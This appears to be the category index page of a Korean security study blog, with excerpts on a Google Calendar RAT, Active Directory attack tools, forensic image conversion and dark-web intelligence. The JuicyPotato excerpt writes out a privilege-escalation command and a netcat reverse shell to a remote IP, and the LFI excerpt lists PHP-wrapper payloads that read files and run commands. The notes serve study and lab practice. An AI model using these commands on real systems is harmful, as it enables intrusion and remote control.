공부/ETC
구글 캘린더를 이용한 RAT - GCR
점점 정상 클라우드 서비스를 C2로 사용하는 악성코드가 많이 등장하는 것 같다.. 타임라인 분석 시 좀 더 상세하게 확인해야 할 필요가 늘고 있다. 아래는 Github 주소 https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
공부/ETC
공부/ETC
Active Directroy 관련 공격 도구
spraykatz Credentials gathering tool automating remote procdump and parse of lsass process. BloodHound Six Degrees of Domain Admin. CrackMapExec A swiss army knife for pentesting networks. pywerview A (partial) Python rewriting of PowerSploit's PowerView. Prenum The perils of the pre-Windows 2000 compatible access group in a Windows domain. adPEAS Powershell tool to automate Active Directory enu..
공부/ETC
JuciyPotato usage
- Victim jp.exe -t * -p C:\Users\12\Desktop\2312\r-shell.bat.bat -l 1337 - shell.bat START C:\Users\12\Desktop\2312\nc.exe -e cmd.exe 10.10.10.10 1111 - Client nc -nlvp 1111
공부/ETC
QEMU image convert to vmdk - QEMU 이미지 변환
클라우드 서비스를 이용하여 관련 이미지를 import하는 경우, QEMU 형식의 파일로 저장될때가 있음. 이 경우, FTK Imager 등으로 인식이 안되는데 이때 아래 도구로 변환이 가능함 qemu-img for Windows https://cloudbase.it/qemu-img-windows/ 도구 다운로드 후 아래 방식으로 현재 이미지 파일의 형식을 먼저 확인 qemu-img.exe info [이미지 파일] "file format" 부분에 현재 이미지 형식을 확인한 뒤, 아래 명령어로 변환 진행 # qemu-img.exe convert -f [기존 이미지 형식] -O [변환 이미지 형식] [기존 이미지명] [변환 이미지명] qemu-img.exe convert -f qcow2 -O vmdk IMAG..
공부/ETC
LFI(Local File Inclusion) with PHP wrapper
1. php://filter - I/O 스트림을 사용하는 wrapper - 주로 base64를 이용하여 encode/decode 형식으로 파일 내용을 읽어온다. - ex)/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag - base64를 사용하지 못할 경우엔, rot13을 활용하기도 한다. - convert.base64-encode -> string.rot13 2. expect:// - system command 실행 - ex)?page=except://whoami 3. zip:// - 압축 해제 후 해당 압축 파일 안의 파일 실행 - ex)?page=zip://압축파일명#실행파일명 공식 문서 : www.php.net/man..
공부/ETC
CTI - 다크웹(DarkWeb)
1. 다크웹이란? Surface Web 일반적으로 우리가 사용하는 웹사이트 Bing, Google, Wikipedia Deep Web 접속권한이 요구되는 Web Dark Web 특정 브라우저와 접근기술이 요구되는 Web 철저한 익명성이 보장되는, 추적이 불가능한 Web 2002년, 미 해군 연구소에서 Tor(토어) network 개발 군사 목적 2006년, Tor 기술 공개(오픈소스) 2009년, Bitcoin 등장 → 정부 통제를 벗어난 암호화폐가 다크웹의 거래 수단으로 자리 잡음 사이버 범죄 Global Eco-system 형성 2011년, Silk Road 탄생 비트코인 결제만을 지원하는 마약, 정보, 악성코드 등 불법적인 거래가 이루어짐. 규모가 1천억대이상 추정 2013년, FBI가 Silk R..
